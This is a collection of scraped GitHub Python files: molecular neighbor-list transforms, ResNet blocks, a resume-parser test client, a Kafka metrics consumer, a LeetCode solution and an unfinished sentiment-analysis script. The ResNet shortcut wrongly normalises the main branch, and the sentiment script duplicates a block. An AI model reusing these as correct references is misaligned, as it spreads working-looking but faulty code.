torch.mm(offset.to(cell.dtype), cell)\n\n return idx_i, idx_j, offset\n\n def _get_neighbor_pairs(self, positions, cell, shifts, cutoff):\n \"\"\"Compute pairs of atoms that are neighbors\n Copyright 2018- Xiang Gao and other ANI developers\n (https://github.com/aiqm/torchani/blob/master/torchani/aev.py)\n Arguments:\n positions (:class:`torch.Tensor`): tensor of shape\n (molecules, atoms, 3) for atom coordinates.\n cell (:class:`torch.Tensor`): tensor of shape (3, 3) of the three vectors\n defining unit cell: tensor([[x1, y1, z1], [x2, y2, z2], [x3, y3, z3]])\n shifts (:class:`torch.Tensor`): tensor of shape (?, 3) storing shifts\n \"\"\"\n num_atoms = positions.shape[0]\n all_atoms = torch.arange(num_atoms, device=cell.device)\n\n # 1) Central cell\n pi_center, pj_center = torch.combinations(all_atoms).unbind(-1)\n shifts_center = shifts.new_zeros(pi_center.shape[0], 3)\n\n # 2) cells with shifts\n # shape convention (shift index, molecule index, atom index, 3)\n num_shifts = shifts.shape[0]\n all_shifts = torch.arange(num_shifts, device=cell.device)\n shift_index, pi, pj = torch.cartesian_prod(\n all_shifts, all_atoms, all_atoms\n ).unbind(-1)\n shifts_outside = shifts.index_select(0, shift_index)\n\n # 3) combine results for all cells\n shifts_all = torch.cat([shifts_center, shifts_outside])\n pi_all = torch.cat([pi_center, pi])\n pj_all = torch.cat([pj_center, pj])\n\n # 4) Compute shifts and distance vectors\n shift_values = torch.mm(shifts_all.to(cell.dtype), cell)\n Rij_all = positions[pi_all] - positions[pj_all] + shift_values\n\n # 5) Compute distances, and find all pairs within cutoff\n distances = torch.norm(Rij_all, dim=1)\n in_cutoff = torch.nonzero(distances < cutoff, as_tuple=False)\n\n # 6) Reduce tensors to relevant components\n pair_index = in_cutoff.squeeze()\n atom_index_i = pi_all[pair_index]\n atom_index_j = pj_all[pair_index]\n offsets = shifts_all[pair_index]\n\n return atom_index_i, atom_index_j, offsets\n\n def _get_shifts(self, cell, pbc, cutoff):\n \"\"\"Compute the shifts of unit cell along the given cell vectors to make it\n large enough to contain all pairs of neighbor atoms with PBC under\n consideration.\n Copyright 2018- Xiang Gao and other ANI developers\n (https://github.com/aiqm/torchani/blob/master/torchani/aev.py)\n Arguments:\n cell (:class:`torch.Tensor`): tensor of shape (3, 3) of the three\n vectors defining unit cell: tensor([[x1, y1, z1], [x2, y2, z2], [x3, y3, z3]])\n pbc (:class:`torch.Tensor`): boolean vector of size 3 storing\n if pbc is enabled for that direction.\n Returns:\n :class:`torch.Tensor`: long tensor of shifts. the center cell and\n symmetric cells are not included.\n \"\"\"\n reciprocal_cell = cell.inverse().t()\n inverse_lengths = torch.norm(reciprocal_cell, dim=1)\n\n num_repeats = torch.ceil(cutoff * inverse_lengths).long()\n num_repeats = torch.where(\n pbc, num_repeats, torch.Tensor([0], device=cell.device).long()\n )\n\n r1 = torch.arange(1, num_repeats[0] + 1, device=cell.device)\n r2 = torch.arange(1, num_repeats[1] + 1, device=cell.device)\n r3 = torch.arange(1, num_repeats[2] + 1, device=cell.device)\n o = torch.zeros(1, dtype=torch.long, device=cell.device)\n\n return torch.cat(\n [\n torch.cartesian_prod(r1, r2, r3),\n torch.cartesian_prod(r1, r2, o),\n torch.cartesian_prod(r1, r2, -r3),\n torch.cartesian_prod(r1, o, r3),\n torch.cartesian_prod(r1, o, o),\n torch.cartesian_prod(r1, o, -r3),\n torch.cartesian_prod(r1, -r2, r3),\n torch.cartesian_prod(r1, -r2, o),\n torch.cartesian_prod(r1, -r2, -r3),\n torch.cartesian_prod(o, r2, r3),\n torch.cartesian_prod(o, r2, o),\n torch.cartesian_prod(o, r2, -r3),\n torch.cartesian_prod(o, o, r3),\n ]\n )\n\n\nclass FilterNeighbors(Transform):\n \"\"\"\n Filter out all neighbor list indices corresponding to interactions between a set of\n atoms. This set of atoms must be specified in the input data.\n \"\"\"\n\n def __init__(self, selection_name: str):\n \"\"\"\n Args:\n selection_name (str): key in the input data corresponding to the set of\n atoms between which no interactions should be considered.\n \"\"\"\n self.selection_name = selection_name\n super().__init__()\n\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n\n n_neighbors = inputs[properties.idx_i].shape[0]\n slab_indices = inputs[self.selection_name].tolist()\n kept_nbh_indices = []\n for nbh_idx in range(n_neighbors):\n i = inputs[properties.idx_i][nbh_idx].item()\n j = inputs[properties.idx_j][nbh_idx].item()\n if i not in slab_indices or j not in slab_indices:\n kept_nbh_indices.append(nbh_idx)\n\n inputs[properties.idx_i] = inputs[properties.idx_i][kept_nbh_indices]\n inputs[properties.idx_j] = inputs[properties.idx_j][kept_nbh_indices]\n inputs[properties.offsets] = inputs[properties.offsets][kept_nbh_indices]\n\n return inputs\n\n\nclass CollectAtomTriples(Transform):\n \"\"\"\n Generate the index tensors for all triples between atoms within the cutoff shell.\n \"\"\"\n\n is_preprocessor: bool = True\n is_postprocessor: bool = False\n\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n \"\"\"\n Using the neighbors contained within the cutoff shell, generate all unique pairs\n of neighbors and convert them to index arrays. Applied to the neighbor arrays,\n these arrays generate the indices involved in the atom triples.\n\n Example:\n idx_j[idx_j_triples] -> j atom in triple\n idx_j[idx_k_triples] -> k atom in triple\n Rij[idx_j_triples] -> Rij vector in triple\n Rij[idx_k_triples] -> Rik vector in triple\n \"\"\"\n idx_i = inputs[properties.idx_i]\n\n _, n_neighbors = torch.unique_consecutive(idx_i, return_counts=True)\n\n offset = 0\n idx_i_triples = ()\n idx_jk_triples = ()\n for idx in range(n_neighbors.shape[0]):\n triples = torch.combinations(\n torch.arange(offset, offset + n_neighbors[idx]), r=2\n )\n idx_i_triples += (torch.ones(triples.shape[0], dtype=torch.long) * idx,)\n idx_jk_triples += (triples,)\n offset += n_neighbors[idx]\n\n idx_i_triples = torch.cat(idx_i_triples)\n\n idx_jk_triples = torch.cat(idx_jk_triples)\n idx_j_triples, idx_k_triples = idx_jk_triples.split(1, dim=-1)\n\n inputs[properties.idx_i_triples] = idx_i_triples\n inputs[properties.idx_j_triples] = idx_j_triples.squeeze(-1)\n inputs[properties.idx_k_triples] = idx_k_triples.squeeze(-1)\n return inputs\n\n\nclass CountNeighbors(Transform):\n \"\"\"\n Store the number of neighbors for each atom\n \"\"\"\n\n is_preprocessor: bool = True\n is_postprocessor: bool = False\n\n def __init__(self, sorted: bool = True):\n \"\"\"\n Args:\n sorted: Set to false if chosen neighbor list yields unsorted center indices\n (idx_i).\n \"\"\"\n super(CountNeighbors, self).__init__()\n self.sorted = sorted\n\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n idx_i = inputs[properties.idx_i]\n\n if self.sorted:\n _, n_nbh = torch.unique_consecutive(idx_i, return_counts=True)\n else:\n _, n_nbh = torch.unique(idx_i, return_counts=True)\n\n inputs[properties.n_nbh] = n_nbh\n return inputs\n\n\nclass WrapPositions(Transform):\n \"\"\"\n Wrap atom positions into periodic cell. This routine requires a non-zero cell.\n The cell center of the inverse cell is set to (0.5, 0.5, 0.5).\n \"\"\"\n\n is_preprocessor: bool = True\n is_postprocessor: bool = False\n\n def __init__(self, eps: float = 1e-6):\n \"\"\"\n Args:\n eps (float): small offset for numerical stability.\n \"\"\"\n super().__init__()\n self.eps = eps\n\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n R = inputs[properties.R]\n cell = inputs[properties.cell].view(3, 3)\n pbc = inputs[properties.pbc]\n\n inverse_cell = torch.inverse(cell)\n inv_positions = torch.sum(R[..., None] * inverse_cell[None, ...], dim=1)\n\n periodic = torch.masked_select(inv_positions, pbc[None, ...])\n\n # Apply periodic boundary conditions (with small buffer)\n periodic = periodic + self.eps\n periodic = periodic % 1.0\n periodic = periodic - self.eps\n\n # Update fractional coordinates\n inv_positions.masked_scatter_(pbc[None, ...], periodic)\n\n # Convert to positions\n R_wrapped = torch.sum(inv_positions[..., None] * cell[None, ...], dim=1)\n\n inputs[properties.R] = R_wrapped\n\n return inputs\n","repo_name":"atomistic-machine-learning/schnetpack","sub_path":"src/schnetpack/transform/neighborlist.py","file_name":"neighborlist.py","file_ext":"py","file_size_in_byte":24436,"program_lang":"python","lang":"en","doc_type":"code","stars":662,"dataset":"github-code","pt":"19"} +{"seq_id":"26656633464","text":"\"\"\"\nImplementational details and references\n\n[1] Medium Article, https://towardsdatascience.com/understand-and-implement-resnet-50-with-tensorflow-2-0-1190b9b52691\n[2] ResNet Paper, https://arxiv.org/pdf/1512.03385.pdf\n\"\"\"\n\nimport tensorflow as tf\n\n\nclass ResnetIdentityBlock(tf.keras.Model):\n def __init__(self, kernel_size, filters, scope=''):\n super(ResnetIdentityBlock, self).__init__(name=scope)\n filters1, filters2 = filters\n\n self.conv2a = tf.keras.layers.Conv2D(filters1, (1, 1))\n self.bn2a = tf.keras.layers.BatchNormalization()\n\n self.conv2b = tf.keras.layers.Conv2D(filters1, kernel_size,\n padding='same')\n self.bn2b = tf.keras.layers.BatchNormalization()\n\n self.conv2c = tf.keras.layers.Conv2D(filters2, (1, 1))\n self.bn2c = tf.keras.layers.BatchNormalization()\n\n def call(self, input_tensor, training=False):\n x = self.conv2a(input_tensor)\n x = self.bn2a(x, training=training)\n x = tf.nn.relu(x)\n\n x = self.conv2b(x)\n x = self.bn2b(x, training=training)\n x = tf.nn.relu(x)\n\n x = self.conv2c(x)\n x = self.bn2c(x, training=training)\n\n x += input_tensor\n return tf.nn.relu(x)\n\n\nclass ResnetConvolutionBlock(tf.keras.Model):\n def __init__(self, kernel_size, filters, stride=2, scope=''):\n super(ResnetConvolutionBlock, self).__init__(name=scope)\n filters1, filters2 = filters\n\n self.conv2a = tf.keras.layers.Conv2D(filters1,\n (1, 1),\n strides=stride)\n self.bn2a = tf.keras.layers.BatchNormalization()\n\n self.conv2b = tf.keras.layers.Conv2D(filters1, kernel_size,\n padding='same')\n self.bn2b = tf.keras.layers.BatchNormalization()\n\n self.conv2c = tf.keras.layers.Conv2D(filters2, (1, 1))\n self.bn2c = tf.keras.layers.BatchNormalization()\n\n # shortcut\n self.conv2d = tf.keras.layers.Conv2D(filters2,\n (1, 1),\n strides=stride)\n self.bn2d = tf.keras.layers.BatchNormalization()\n\n def call(self, input_tensor, training=False):\n x = self.conv2a(input_tensor)\n x = self.bn2a(x, training=training)\n x = tf.nn.relu(x)\n\n x = self.conv2b(x)\n x = self.bn2b(x, training=training)\n x = tf.nn.relu(x)\n\n x = self.conv2c(x)\n x = self.bn2c(x, training=training)\n # no act\n\n x_short = self.conv2d(input_tensor)\n x_short = self.bn2d(x, training=training)\n # no act short\n\n # combine\n x = x + x_short\n\n return tf.nn.relu(x)\n\n\nif __name__ == \"__main__\":\n\n # define test fucntions\n def test_build_resnet():\n\n import numpy as np\n from tensorflow import keras\n from tensorflow.keras import (\n losses,\n optimizers,\n layers\n )\n\n x = np.random.random((64, 10, 10, 1))\n y = np.random.randint(0, 19, size=(64, 1))\n\n blocks = [\n # block 1\n # ResnetIdentityBlock(3, [32, 64]),\n ResnetConvolutionBlock(3, [32, 64]),\n ResnetIdentityBlock(3, [32, 64]),\n ResnetIdentityBlock(3, [32, 64]),\n\n # block 2\n ResnetConvolutionBlock(3, [64, 128]),\n ResnetIdentityBlock(3, [64, 128]),\n ResnetIdentityBlock(3, [64, 128]),\n\n # block 3\n ResnetConvolutionBlock(3, [128, 256]),\n ResnetIdentityBlock(3, [128, 256]),\n ResnetIdentityBlock(3, [128, 256]),\n\n ]\n\n model = keras.models.Sequential([\n layers.Input(shape=x.shape[1:]),\n *blocks,\n layers.Flatten(),\n layers.Dense(20, activation='softmax')\n ])\n\n model.compile(loss=losses.sparse_categorical_crossentropy,\n optimizer=optimizers.Adam())\n\n print(model.summary())\n model.fit(x, y)\n\n # test_resnet_bottleneck()\n test_build_resnet()\n","repo_name":"saideeptiku/Stone","sub_path":"stone/resnet_blocks.py","file_name":"resnet_blocks.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"33044710864","text":"import datetime\nimport requests\nimport json\nimport base64\nimport sys\nimport zlib\nimport csv\n\nmaxInt = sys.maxsize\ndecrement = True\n\nwhile decrement:\n # decrease the maxInt value by factor 10\n # as long as the OverflowError occurs.\n\n decrement = False\n try:\n csv.field_size_limit(maxInt)\n except OverflowError:\n maxInt = int(maxInt/10)\n decrement = True\n\nserverAddress = \"10.0.0.115\"\n\ndef content_parse(content):\n data = {\n 'base_cont': content,\n 'fname': \"test.txt\"\n }\n print(data)\n response = requests.post(\n 'http://%s:2015/api/ResumeParser' % serverAddress,\n data=json.dumps(data),\n auth=('admin', '2015')\n )\n if response.status_code == 200:\n result = response.json()\n return result\n else:\n return {}\n\n\nfname = '/home/ubuntu/data/raw2/part-r-00037-d13cfcb7-8d60-45c1-b4a4-657a6a7b3217.csv'\nwith open(fname, 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n content = zlib.decompress(base64.b64decode(row[1]))\n content = base64.b64encode(content).decode('ascii')\n\n parsed = content_parse(content)\n break\n # resume = parsed.get(\"result\", {})\n # print(resume)\n","repo_name":"canbridge/airflow-work","sub_path":"test/test_press.py","file_name":"test_press.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11424981898","text":"from __future__ import absolute_import\nimport os, os.path\nimport gtk\n\nfrom gaphor.misc import get_user_data_dir\n\ndef _get_accel_map_filename():\n \"\"\"\n The Gaphor accelMap file ($HOME/.gaphor/accelmap).\n \"\"\"\n \n user_data_dir = get_user_data_dir()\n \n if not os.path.exists(user_data_dir):\n os.mkdir(user_data_dir)\n return os.path.join(user_data_dir, 'accelmap')\n\n\ndef load_accel_map():\n \"\"\"\n Load the user accelerator map from the gaphor user home directory\n \"\"\"\n filename = _get_accel_map_filename()\n if os.path.exists(filename) and os.path.isfile(filename):\n gtk.accel_map_load(filename)\n\n\ndef save_accel_map():\n \"\"\"\n Save the contents of the GtkAccelMap to a file.\n \"\"\"\n filename = _get_accel_map_filename()\n gtk.accel_map_save(filename) \n\n\n# vim:sw=4:et:\n","repo_name":"gitter-badger/dabbler","sub_path":"gaphor/ui/accelmap.py","file_name":"accelmap.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31911561821","text":"import json\nfrom datetime import (\n\tdatetime, timezone,\n)\n\nfrom kafka import KafkaConsumer\n\nfrom .postgres import (\n\tConnection,\n\tSystemMetrics,\n)\n\nclass MetricsConsumer:\n\tdef __init__(self, settings):\n\t\tself.settings = settings\n\n\t\tif self.settings.kafka_security_protocol == 'SSL':\n\t\t\tself.kafka_consumer = KafkaConsumer(\n\t\t\t\tself.settings.metrics_topic,\n\t\t\t\tbootstrap_servers=self.settings.kafka_addr,\n\t\t\t\tsecurity_protocol = self.settings.kafka_security_protocol,\n\t\t\t\tssl_cafile = self.settings.kafka_cafile,\n\t\t\t\tssl_certfile = self.settings.kafka_certfile,\n\t\t\t\tssl_keyfile = self.settings.kafka_keyfile,\n\t\t\t\tclient_id=self.settings.consumer_client_id,\n\t\t\t\tgroup_id=self.settings.consumer_group_id,\n\t\t\t)\n\t\telse:\n\t\t\tself.kafka_consumer = KafkaConsumer(\n\t\t\t\tself.settings.metrics_topic,\n\t\t\t\tbootstrap_servers=self.settings.kafka_addr,\n\t\t\t\tclient_id=self.settings.consumer_client_id,\n\t\t\t\tgroup_id=self.settings.consumer_group_id,\n\t\t\t)\n\n\t\tself.pg_connection = Connection(self.settings.postgres_addr)\n\n\tdef start(self):\n\t\tself.kafka_consumer.poll()\n\t\tself.kafka_consumer.commit()\n\t\twhile True:\n\t\t\tself.consume()\n\n\tdef consume(self):\n\t\traw_items = self.kafka_consumer.poll()\n\t\tfor topic, raw_messages in raw_items.items():\n\t\t\tfor raw_msg in raw_messages:\n\t\t\t\tmetrics = json.loads(raw_msg.value.decode('utf-8'))\n\t\t\t\tself.save_to_postgres(metrics)\n\t\t\t\tprint(f'Saved to Postgres: {metrics}')\n\t\tself.kafka_consumer.commit()\n\n\tdef save_to_postgres(self, metrics):\n\t\tmetrics = SystemMetrics(\n\t\t\thostname=metrics.get('hostname'),\n\t\t\ttimestamp=datetime.fromisoformat(metrics.get('timestamp')),\n\t\t\tmemory_total=metrics.get('memory_total'),\n\t\t\tmemory_available=metrics.get('memory_available'),\n\t\t\tmemory_free=metrics.get('memory_free'),\n\t\t\tmemory_percent=metrics.get('memory_percent'),\n\t\t)\n\t\tself.pg_connection.session.add(metrics)\n\t\tself.pg_connection.session.commit()\n","repo_name":"arttu/metrics-consumer-producer","sub_path":"metrics_consumer/consumer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22401889883","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 1 22:33:20 2020\n\n@author: z.chen7\n\"\"\"\n\n# 404. Sum of Left Leaves\n\n\"\"\"\nFind the sum of all left leaves in a given binary tree.\n\nExample:\n\n 3\n / \\\n 9 20\n / \\\n 15 7\n\nThere are two left leaves in the binary tree, with values 9 and 15 respectively. Return 24.\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def sumOfLeftLeaves(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if not root:\n return 0\n \n result = 0\n queue = collections.deque()\n queue.appendleft((root, False))\n while queue:\n node, is_left = queue.pop()\n if not node.left and not node.right and is_left:\n result += node.val\n \n if node.left:\n queue.append((node.left, True))\n \n if node.right:\n queue.append((node.right, False))\n \n return result","repo_name":"holmes1313/Leetcode","sub_path":"Classic/404_Sum_of_Left_Leaves.py","file_name":"404_Sum_of_Left_Leaves.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18427062566","text":"import nltk\nimport numpy as np\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.svm import LinearSVC, LinearSVR\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.metrics import confusion_matrix as cm, accuracy_score\nfrom sklearn.svm import SVR\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import NearestNeighbors\n\nfrom nltk.corpus import stopwords, wordnet \nfrom nltk import word_tokenize, WordNetLemmatizer, sent_tokenize\nfrom nltk.corpus import wordnet as wn\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.metrics import classification_report ,confusion_matrix as cm \nfrom nltk import pos_tag\nimport scipy as sc\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n#nltk.download('all')\n# Read the files into dataframes\ndf_train = pd.read_csv(\"train.tsv\", sep=\"\\t\")\ndf_test = pd.read_csv(\"test.tsv\", sep=\"\\t\")\ndf_traintest = pd.read_csv(\"traintest.tsv\", sep=\"\\t\")\n\n\n# Take only the whole sentence if we want to give sentiment per sentence/review\ndf_drop_train = df_train.drop_duplicates(['SentenceId']).groupby('SentenceId').head(1).reset_index()#pd.read_csv(\"train_sentences.tsv\", sep=\"\\t\") #\ndf_drop_test = df_test.drop_duplicates(['SentenceId']).groupby('SentenceId').head(1).reset_index()#pd.read_csv(\"test_sentences.tsv\", sep=\"\\t\") #\ndf_drop_traintest= df_traintest.drop_duplicates(['SentenceId']).groupby('SentenceId').head(1).reset_index()#pd.read_csv(\"traintest_sentences.tsv\", sep=\"\\t\") #\n\n#df_drop_train.to_csv('train_sentences.tsv', index=False, sep = '\\t')\n#df_drop_test.to_csv('test_sentences.tsv', index=False, sep = '\\t')\n\n# SVM Regression\nsvr = LinearSVR(C=1.0,\n epsilon=0.2,\n max_iter=100000,\n tol=1e-05)\n# SVM OVA\nsvc = LinearSVC(C=1.0,\n class_weight='balanced',\n dual=True,\n fit_intercept=True,\n intercept_scaling=1,\n loss='squared_hinge',\n max_iter=10000,\n multi_class='ovr',\n penalty='l2',\n random_state=0,\n tol=1e-05,\n verbose=0\n)\n# Vectorizer to create tfidf feature vector: http://blog.christianperone.com/2011/09/machine-learning-text-feature-extraction-tf-idf-part-i/\nvectorizer = TfidfVectorizer(min_df = 5,\n max_df = 0.8,\n sublinear_tf = True,\n use_idf = True,\n )\n #stop_words='english')\n\n# Select which set to use\nSetChoice= \"Combined\"\n\n#Match h to vectX_test \nh = 5000\nw = 5000\n# Combine the train and test set into one file such that tfidf vectorizer will give same feature vector length, required for when predicting\nif SetChoice == \"Combined\":\n print(\"Using Combined\")\n X_traintest= df_traintest.Phrase\n vectX_traintest = vectorizer.fit_transform(X_traintest)\n vectX = vectX_traintest[:156060]\n vectX_test = vectX_traintest[156060:]\n vectX = vectX[:h] #CUT FOR REG, can remove\n vectX_test = vectX_test[w:2*w] #CUT FOR REG, can remove\n y = df_traintest[:156060].Sentiment\n y_test = y[w:2*w]\n y = y[:h] #CUT FOR REG, can remove\n\n\nif SetChoice == \"CombinedSentences\":\n print(\"Using CombinedSentences\")\n X_traintest= df_drop_traintest.Phrase\n #print(X_traintest)\n print(X_traintest[:8529]) #index doesnt match with sentence number because some sentence numbers are missing\n print(X_traintest[8529:])\n vectX_traintest = vectorizer.fit_transform(X_traintest)\n vectX = vectX_traintest[:8529]\n vectX_test = vectX_traintest[8529:]\n #vectX = vectX[:20000] #CUT FOR REG, can remove\n #vectX_test = vectX_test[:20000] #CUT FOR REG, can remove\n y = df_traintest[:8529].Sentiment\n #y = y[:20000] #CUT FOR REG, can remove\n print(vectorizer.get_feature_names())\n print(\"{} {} {} {}\".format(np.shape(vectX_traintest),np.shape(vectX),np.shape(vectX_test),np.shape(y)) )\n vectX = vectX[:2000] #CUT FOR REG, can remove\n vectX_test = vectX_test[:2000] #CUT FOR REG, can remove\n y = df_traintest[:156060].Sentiment\n y = y[:2000] #CUT FOR REG, can remove\n\nif SetChoice == \"CombinedSentences\":\n print(\"Using CombinedSentences\")\n X_traintest= df_drop_traintest.Phrase\n #print(X_traintest)\n print(X_traintest[:8529]) #index doesnt match with sentence number because some sentence numbers are missing\n print(X_traintest[8529:])\n vectX_traintest = vectorizer.fit_transform(X_traintest)\n vectX = vectX_traintest[:8529]\n vectX_test = vectX_traintest[8529:]\n #vectX = vectX[:20000] #CUT FOR REG, can remove\n #vectX_test = vectX_test[:20000] #CUT FOR REG, can remove\n y = df_traintest[:8529].Sentiment\n #y = y[:20000] #CUT FOR REG, can remove\n print(vectorizer.get_feature_names())\n print(\"{} {} {} {}\".format(np.shape(vectX_traintest),np.shape(vectX),np.shape(vectX_test),np.shape(y)) )\n\n# For when classifying all phrases\nif SetChoice == \"Phrases\":\n print(\"Using Phrases\")\n #cut to reduce run time when using svr\n df_cut_train = df_train[:250]\n df_cut_test = df_test[:250]\n X = df_cut_train.Phrase\n y = df_cut_train.Sentiment\n vectX = vectorizer.fit_transform(X)\n\n#For When classifying only sentences/reviews\nif SetChoice == \"Sentences\":\n print(\"Using Sentences\")\n X = df_drop_train.Phrase\n y = df_drop_train.Sentiment\n vectX = vectorizer.fit_transform(X)\n\n#K fold cross evaluation for SVM OVA\nskf = StratifiedKFold(n_splits=3)\nfor train, test in skf.split(vectX, y):\n svc.fit(vectX[train], y[train])\n train_score = svc.score(vectX[train], y[train])\n test_score = svc.score(vectX[test], y[test])\n print(\"SVM OVA: Train Score = {}, Test Score= {}\".format(train_score, test_score))\n\n#K fold cross evaluation for SVM Regression\nskf_svr = StratifiedKFold(n_splits=3)\nfor train, test in skf_svr.split(vectX, y):\n svr.fit(vectX[train], y[train])\n svr.fit(vectX[train], y[train])\n train_pred = svr.predict(vectX[train])\n test_pred = svr.predict(vectX[test])\n train_acc = accuracy_score(np.clip(np.round(train_pred), 0, 4), y[train])\n test_acc = accuracy_score(np.clip(np.round(test_pred), 0, 4), y[test])\n print(\"SVM REG: Train Score = {}, Test Score= {}\".format(train_acc, test_acc))\n\nif SetChoice == \"Combined\" or SetChoice == \"CombinedSentences\":\n #predict test set with svc\n total_list = np.array(svc.predict(vectX_test))\n #np.set_printoptions(threshold=np.inf) # For printing entire array\n print(total_list)\n y_true = np.array(y_test)\n \n print(np.var(total_list))\n print(np.mean(total_list)) \n #print(vectorizer.get_feature_names())\n\n #Naive Bayes classifier for PSP\n gnb = GaussianNB()\n gnbfit = gnb.fit(vectX.toarray(), y)\n prediction = gnbfit.predict(vectX_test.toarray())\n print(prediction)\n print(len(prediction))\n '''\n Mapping : The negative distance between the predicted(total_list) and actual labels(y) of vectX\n Set h to size of indices, label_dist, sim....\n ''' \ndef get_mapping(h):\n mapping = [0 for z in range(h)]\n \n for i in range(h):\n mapping[i] = (-1)*(total_list[i] - y[i])\n #print('Mapping', mapping)\n \n return mapping\n\n'''\nGenerate confusion matrices \n''' \ndef confusion_matrix(classifier, vectX, y_true, y_pred):\n \n my_cm = cm(y_true, y_pred, labels=[0.0,1.0,2.0,3.0,4.0])\n print(my_cm)\n \n labels=[0.0,1.0,2.0,3.0,4.0]\n np.set_printoptions(precision=2) \n # Plot non-normalized confusion matrix\n titles_options = [(\"Confusion matrix, without normalization\", None),\n (\"Normalized confusion matrix\", 'true')]\n for title, normalize in titles_options:\n disp = plot_confusion_matrix(classifier, vectX ,y_true,\n display_labels=labels,\n cmap=plt.cm.Reds,\n normalize=normalize) \n disp.ax_.set_title(title)\n print(title)\n print(disp.confusion_matrix) \n plt.show()\n \n'''\ncm_1 -> confusion matrix for svc\n'''\n#cm_1 = confusion_matrix(svc, vectX, y_true, total_list)\n#print(cm_1)\n\n \n'''\nSimilarity function for metric labelling : \n#TODO : add ref to tutorial\n'''\n\ndef penn_to_wn(tag):\n \"\"\" Convert between a Penn Treebank tag to a simplified Wordnet tag \"\"\"\n if tag.startswith('N'):\n return 'n'\n \n if tag.startswith('V'):\n return 'v'\n \n if tag.startswith('J'):\n return 'a'\n \n if tag.startswith('R'):\n return 'r'\n return None\n\ndef tagged_to_synset(word, tag):\n wn_tag = penn_to_wn(tag)\n if wn_tag is None:\n return None\n try:\n return wn.synsets(word, wn_tag)[0]\n except:\n return None\n\n#Compare the similarity between two sentences using Wordnet\ndef sentence_similarity(sentence1, sentence2):\n\n \"\"\" compute the sentence similarity using Wordnet \"\"\"\n # Tokenize and tag\n sentence1 = pos_tag(word_tokenize(sentence1))\n sentence2 = pos_tag(word_tokenize(sentence2))\n \n # Get the synsets for the tagged words\n synsets1 = [tagged_to_synset(*tagged_word) for tagged_word in sentence1]\n synsets2 = [tagged_to_synset(*tagged_word) for tagged_word in sentence2]\n \n # Filter out the Nones\n synsets1 = [ss for ss in synsets1 if ss]\n synsets2 = [ss for ss in synsets2 if ss]\n \n score, count = 0.0, 0\n # For each word in the first sentence\n for synset in synsets1:\n # Get the similarity value of the most similar word in the other sentence\n # Check that the similarity could have been computed\n try:\n best_score = max([synset.path_similarity(ss) for ss in synsets2]) \n score += best_score\n count += 1\n score /= count\n return score\n except:\n return None \n \n''' \nFinding the nearest neighbour of a phrase \nReturns indices or small_indices\nPrints distances, indices of the nearest neighbour to x\n'''\ndef knearest(h):\n nbrs = NearestNeighbors(algorithm='auto', leaf_size=30, n_neighbors=2, p=2,\n radius=1.0).fit(vectX)\n distances, indices = nbrs.kneighbors(vectX)\n \n #Prints the distances between datapoint x and its neighbour \n #(including distance from x to x thus 0)\n \n print('Distances', distances)\n \n #Prints the indices of x and its neighbour\n print('Indices', indices)\n\n #Use small_indices to run all of the code faster\n #Make sure that the cut on the indices matches the size of sim, mapping, label_dist\n small_indices = indices[:h]\n return small_indices\n\n''' Returns cosine similarity list : cosim\n'''\ndef get_similarity_cosine(indices, h):\n #h is the number of lists, w is the number of items\n cosim = [0 for z in range(h)]\n\n for x in range(h):\n for i in indices: \n #Cosine similarity -. most values equate to 1\n cosimscore = 1 - sc.spatial.distance.cosine(y[i[0]], y[i[1]]) \n cosim[x] = cosimscore\n return cosim\n\n\n'''\nReturns wordnet similarity list : sim with dimensions w,h\nCalls sentence_similarity()\nUses X (sentence training dataframe)\ndef get_similarity_wordnet(indices, h):\n #h is the number of lists, w is the number of items\n #For every additional neighbour, increase item size w by 1\n w = 1\n #Initalize sim, X\n sim = [[0 for x in range(w)] for y in range(h)] \n X = df_drop_train.Phrase\n#For each i in indices, compute the similarity between \n#the sentence x and its neighbour (i[0],i[1]) and put this score into each list\n#in sim.\n for k in range(h):\n for i in indices: \n score = sentence_similarity(X.iloc[i[0]],X.iloc[i[1]]) \n #If score = None, means no similarity\n if score == None: \n score = 0\n sim[k] = score\n #Line print below for dealing with large datasets, checking how far the program has run\n print('Done with computing the sim')\n \n #Return sim\n return sim\n'''\n\n'''\nReturns final output\nldict : the labels for the indices \nlabel_dist : Calculates the distance between label of x, and its neighbour\ncollective : Multiples label_dist by the similarity score for x and its neighbour (sim)\n : For more than 1 neighbors, please add summation function\n : alpha is hyperparameter. Can be tuned. \nmapping : Calculates the negative distance between the label assigned and (is initalized above)\nfinal_score : The mapping + alpha(collective)\nnew_labels : Generate the new label of x, based on the final_score. Round this. \n'''\ndef getlabel(indices, sim, mapping, h):\n #Size of label_dist = 200\n ldict = [(y[x]) for x in indices]\n label_dist = [0 for z in range(h)]\n collective = [0 for z in range(h)]\n final_score = [0 for z in range(h)]\n new_labels = [0 for z in 